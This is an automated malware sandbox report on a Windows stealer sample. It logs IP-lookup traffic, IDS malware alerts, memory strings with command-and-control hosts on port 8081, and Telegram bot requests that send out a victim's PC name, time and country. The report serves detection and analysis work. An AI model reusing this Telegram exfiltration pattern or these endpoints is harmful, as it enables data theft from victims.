                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2012/03/2025%20/%2005:31:35%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2012/03/2025%20/%2006:00:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49724 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49715 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49720 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49728 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49722 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49725 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49726 -> 104.21.16.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49718 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49721 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2012/03/2025%20/%2005:31:35%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2012/03/2025%20/%2006:00:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 11 Mar 2025 05:28:33 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 11 Mar 2025 05:28:35 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1227795797.0000000004EDE000.00000004.00000800.00020000.00000000.sdmp, vQzHzddZ.exe, 00000007.00000002.1259225217.0000000003811000.00000004.00000800.00020000.00000000.sdmp, vQzHzddZ.exe, 00000007.00000002.1259225217.0000000004019000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3642408543.000000000042E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1227795797.0000000004EDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, vQzHzddZ.exe, 00000007.00000002.1259225217.0000000003811000.00000004.00000800.00020000.00000000.sdmp, vQzHzddZ.exe, 00000007.00000002.1259225217.0000000004019000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3642408543.000000000042E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1227795797.0000000004EDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, vQzHzddZ.exe, 00000007.00000002.1259225217.0000000003811000.00000004.00000800.00020000.00000000.sdmp, vQzHzddZ.exe, 00000007.00000002.1259225217.0000000004019000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3642408543.000000000042E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: RegSvcs.exe, 00000006.00000002.3646802426.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000029D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: RegSvcs.exe, 00000006.00000002.3646802426.0000000002BB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000029B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: RegSvcs.exe, 00000006.00000002.3646802426.0000000002BB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000029B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: RegSvcs.exe, 00000006.00000002.3646802426.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1227795797.0000000004EDE000.00000004.00000800.00020000.00000000.sdmp, vQzHzddZ.exe, 00000007.00000002.1259225217.0000000003811000.00000004.00000800.00020000.00000000.sdmp, vQzHzddZ.exe, 00000007.00000002.1259225217.0000000004019000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3642408543.000000000042E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, vQzHzddZ.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, vQzHzddZ.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: svchost.exe, 00000005.00000002.2856718220.000001BE7D600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                Source: svchost.exe, 00000005.00000003.1205946383.000001BE7D478000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: svchost.exe, 00000005.00000003.1205946383.000001BE7D478000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: svchost.exe, 00000005.00000003.1205946383.000001BE7D478000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: svchost.exe, 00000005.00000003.1205946383.000001BE7D4AD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: edb.log.5.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, vQzHzddZ.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                Source: RegSvcs.exe, 00000006.00000002.3646802426.0000000002BB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000029B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1226193501.00000000037E9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, vQzHzddZ.exe, 00000007.00000002.1256136082.000000000281A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1227795797.0000000004EDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3646802426.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, vQzHzddZ.exe, 00000007.00000002.1259225217.0000000003811000.00000004.00000800.00020000.00000000.sdmp, vQzHzddZ.exe, 00000007.00000002.1259225217.0000000004019000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3646332799.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3642408543.000000000042E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1232049178.00000000099E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
